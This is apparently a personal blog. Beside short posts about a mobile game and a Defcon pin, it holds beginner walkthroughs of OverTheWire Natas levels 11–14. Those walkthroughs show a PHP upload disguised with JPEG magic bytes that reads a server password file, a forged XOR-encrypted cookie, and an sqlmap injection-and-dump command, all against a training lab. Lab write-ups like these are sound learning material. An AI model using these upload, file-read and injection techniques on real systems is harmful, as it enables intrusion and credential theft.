Oct 20, 2022

an experiment

 hey, 

most probably you have already heard that the success is nothing than a result of ongoing hard work and patience. I have heard, read and said this for thousands of times, but my either laziness or lack of patience had never let me see or feel it on my own. 

This year in March I received my first iPhone. I used to be "an Android girl", and I was pretty sure that iOS would never be a part of my life. Yet, I'm studying iOS development now. Anyways, after installing all the  necessary software on the new phone I installed a game, a really funny one - Fishdom by Playrix. I was kind of hooked on it, could play for hours until I didn't feel my fingers. The concept is lovely; you buy fish, you feed them, you design their aquarium, and you play more, and buy more, discover new worlds and new aquariums. Some levels are terribly hard, I could be stuck on the same level for days and I would go crazy but I always kept trying and not a level was unbeatable. 

Yesterday, for the first time in these eight months I came the first in the gold league. That meant something to me so please laugh but not so loudly. 

You know I'm always looking to find something between the lines. So here, this game came as a proof that if you are devoted, if you keep struggling, if you try hard, one day you'll collect enough marbles and you'll be the first. 

I thought it's supposed to be easier...

Oct 11, 2022

go hack yourself

 hey there, 

so I got this pin (btw sent from Defcon) and I loved it. 



 for me hacking is not only about looking for a vulnerability and cracking the system. mostly I see it as the most creative way you can approach to the problem, think differently, finding the point that is not wanted to be found, acting unexpectedly. and what's the point of these actions? at least for me the only goal is the improvement of the safety of the system you are about to hack. 

I caught myself on the thought that all my life I've brought myself to the level of being cracked to find the vulnerable side of mine in order to be able to improve it, to make it and myself more secure, I've put myself in a situation I'm not ready at all to see how I react. for me that's the only way of self-consciousness, of course along with meditation and yoga. 

so, maybe you'll see a pun here and a swearing word, meanwhile this is not offensive at all (pun intended). this can be understood as a motto about knowing yourself and hacking your mind. 

go hack yourself

Mar 29, 2022

OverTheWire – Natas 14

hey you!

I love Natas people! I'll tell you why a bit later. open the sourcecode. it says: if(mysql_num_rows(mysql_query($query, $link)) > 0) {  and many other lines. I even didn't pay attention to those. I got what I needed. mySQL !!! 

twenty minutes ago, I had no idea about SQL. I had only heard about it while going through some books about web application pentesting. so my gut told me: “c'mmon, go and learn what it is after all”. this tutorial was more than enough for this level. 

what I did is assuming that the username should be natas15 and tried to login. oh, my lovely burp suite. intercept is on :)  what we find here: 

POST /index.php HTTP/1.1
Host: natas14.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://natas14.natas.labs.overthewire.org
Authorization: Basic bmF0YXMxNDpMZzk2TTEwVGRmYVB5VkJrSmRqeW1ibGxRNUw2cWRsMQ==
Connection: close
Referer: http://natas14.natas.labs.overthewire.org/
Cookie: __utma=176859643.2101260650.1648221880.1648222577.1648226688.3; __utmz=176859643.1648222577.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)
Upgrade-Insecure-Requests: 1
username=natas15&password=testpassword

I just copy-pasted this in a new file called: natas15. the rest is on sqlmap and here we type: 

sqlmap -r natas15 -p username

and then say "yes" to every question: y, y, y, y... for more info, we add: sqlmap -r natas15 -p username --dump and run again. here comes the sun fun. 

don't get disappointed if the username natas15 doesn't work. try the others as well. hey, you obviously know how to use sqlmap. <3

I thought it's supposed to be easier… 







OverTheWire – Natas 13

 hey there, 

people learn from their mistakes, so does Natas. They have heard that instead of .jpg we were able to upload any file, so they just made some changes and “improved” their security for this level. have they even heard about magic numbers? today they are gonna do their magic for us. 

first just open your terminal and hexdump any .jpg file.  I have just found this cutie in my laptop, so gonna see how .jpg files differ from the other ones.  so, I'm gonna type: xxd -C nameofthephoto.jpg

pay attention to the first bites of the hexdump:ffd8 ffe0 00

these are the magic numbers for .jpg. and they are here for us today. we can convince the server that the file, that we are uploading, is a pure .jpg as it wishes. (ssshhh, don't tell anyone, we are going to upload a wonderful .php that will lead us to our password)

do you remember the script (natas13.php) that we wrote together for the last level ? bring it back, we need it today as well. you have to make some changes though: 

<?php


echo file_get_contents( "/etc/natas_webpass/natas14 ");

?>

and now let's make a .jpg file just to have the magic numbers in it: 

echo -e "\xff\xd8\xff\xe0\n" > newfile.jpg

we should merge these two files: 

cat natas13.php >> newfile.jpg

the rest is the same. upload the file, change the name into .php (now you like burp suite more, right?) and enjoy the moment. come back for the next level. 

I thought it's supposed to be easier…

Mar 28, 2022

OverTheWire – Natas 12

hey there, 

the older we get the harder the life is. here in OverTheWire it's a bit different. so level 12 is much easier if you've already passed the other 11 levels. (Good for you, by the way! what a journey, huh?!)

have you already read the script? actually, there is nothing new for us. we can get the same from the page: you should upload a .jpg file not bigger than 1KB. let's try it. 

before that, do you have burp suite? you're gonna need it. I should  confess, at first I hated it. now it's one of my best friends. please, download it and come back...I'll wait. if you have it already, you need to know how it works, right? Here I've found a tutorial for you to be quick, but I've learned it and in like 5 hours with this crazy guy.

I made just a random .txt file and tried to upload it to see what is happening when you don't upload the required .jpeg. 

Have you noticed? it has transferred it into .jpg. Let's see if we can transfer it into .txt again. and click on the uploaded file: 

voila! it reads the text file. this is so bad… so bad… this is my friend File inclusion vulnerability. what if we create a PHP file because we know that the server supports PHP. no worries, this is going to be easy, you just need one command: file_get_contents, and we already know where the password is right: /etc/natas_webpass/natas13. it should look like this: 

<?php


echo file_get_contents( "/etc/natas_webpass/natas13 ");


save the file as natas12.php and upload it. then just go back to your close friend burp suit and change the .jpg into .php, click forward. what do you think? what will happen if you open the uploaded file? do it yourself, I trust you! see you on the next level. 

I thought it's supposed to be easier...






Mar 27, 2022

OverTheWire – Natas 11

 hey there, 

so you have already passed all the previous levels, congrats, you are good to go! it's getting a bit complicated from now on. No worries! I'm here to make it easier for you. Now we are on level 11, and I hope you have the password. 

What do we see here? 

you already know what to do, right? let's see what the sourcecode says: 

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

$defaultdata array contains two values: showpassword and bgcolor. (you do see that “no”, do you? we are gonna change that to “yes”)

what is on the next line? xor_encrypt? what a new hell is this? let me explain: XOR Encryption is like two salads with one same ingredient – the key. in both cases (Encryption and Decryption) the key stays the same. if the plain text has the same length as the key, it's used once, if not - key is repeated. here I've found a very simple explanation of the concept for you. 

now that we know what xor encryption means, let's go on and look at the rest of the sourcecode. 

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;

what does it say? look at the 5th line. 

$tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);

hah! Cookie? So we must pay attention to the cookies, there should be something for us. 



"Cookies are protected with XOR encryption" says the page. not only that, if you've already paid some attention, $tempdata has played some games: json_decode,  xor_encrtpt and then base64_decode. What we can do is to start from the end. 

1) base64 decoding our favorite line of the cookies (base64 -d)
2) in order to be able to do some xor_encrtypt, we need a hexdump, so 
3) base64 -d | xxd -p

note: you'll see %3D at the end of the cookie, which is URL encoding, basically it is  a =, so replace that part with =.

the result should look like this: 



4) now we have the output of our xor_encrypt and we need the plain text to be able to find out the key. 

here comes some php coding copy-pasting (don't worry if you can't code in php and remember, you just need to understand what's written in there)

just create a php file and type or copy-paste the following. 

<?php

$in = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

print(json_encode($in));

?>


the output is going to be our input for the XOR encryption. 

{"showpassword":"no","bgcolor":"#ffffff"}


the world is full of encrypting - decrypting websites. here is one

voila! we have our key: qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq 

if you remember, I have already told you, that in case the key is short, it is repeated. so the exact key is: qw8J

our crazy mind says: go and copy some other code out there. 

go back to your php file and do some edits. I had told you we were gonna make the "no" into a very nice "yes".

execute the file, and you will see a whole another cookie there: 

ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK


what is required is to replace the previous one with this new, much better one. and please, don't forget to add %3D at the end. the rest is on you! enjoy the moment of seeing the password on your screen. you deserve it! 

I thought it's supposed to be easier...




Mar 26, 2022

intro(2) why

hey there, 

I had been thinking about having an English blog for like a year (or more…whatever). the gods of Olympia had foreseen that it should be opened on a cold spring day somewhere in 2022. who am I not to follow their predictions?

So it's already 5 am, but we are still sitting at Antranig's office working and listening to some good music which makes us alive awake. 

meanwhile, I'm trying to solve some levels from Natas, and (what a surprise!) it doesn't seem to be a child's play. being a complete beginner in the field, I needed some hints, at least. Hackmethod has already posted a few blogs with hints and everything but unfortunatelly  they have given up after level 10 so right after that you choose: either look for other blogs and find too many spoilers, or DIY. spoilers and already written passwords are not acceptable for me, I'm doing this for learning and I require explanations for the steps. there is nothing left than doing it myself (this means I'm just gonna ask some help from the Discord community) and blog about every level (of course without spoilers, just brief tips). 

so, my word for the coming generations: “follow my future blogs, because I'm going to post some hints for each level in case you have difficulties… and before I forget, stay hydrated”.

I thought it's supposed to be easier...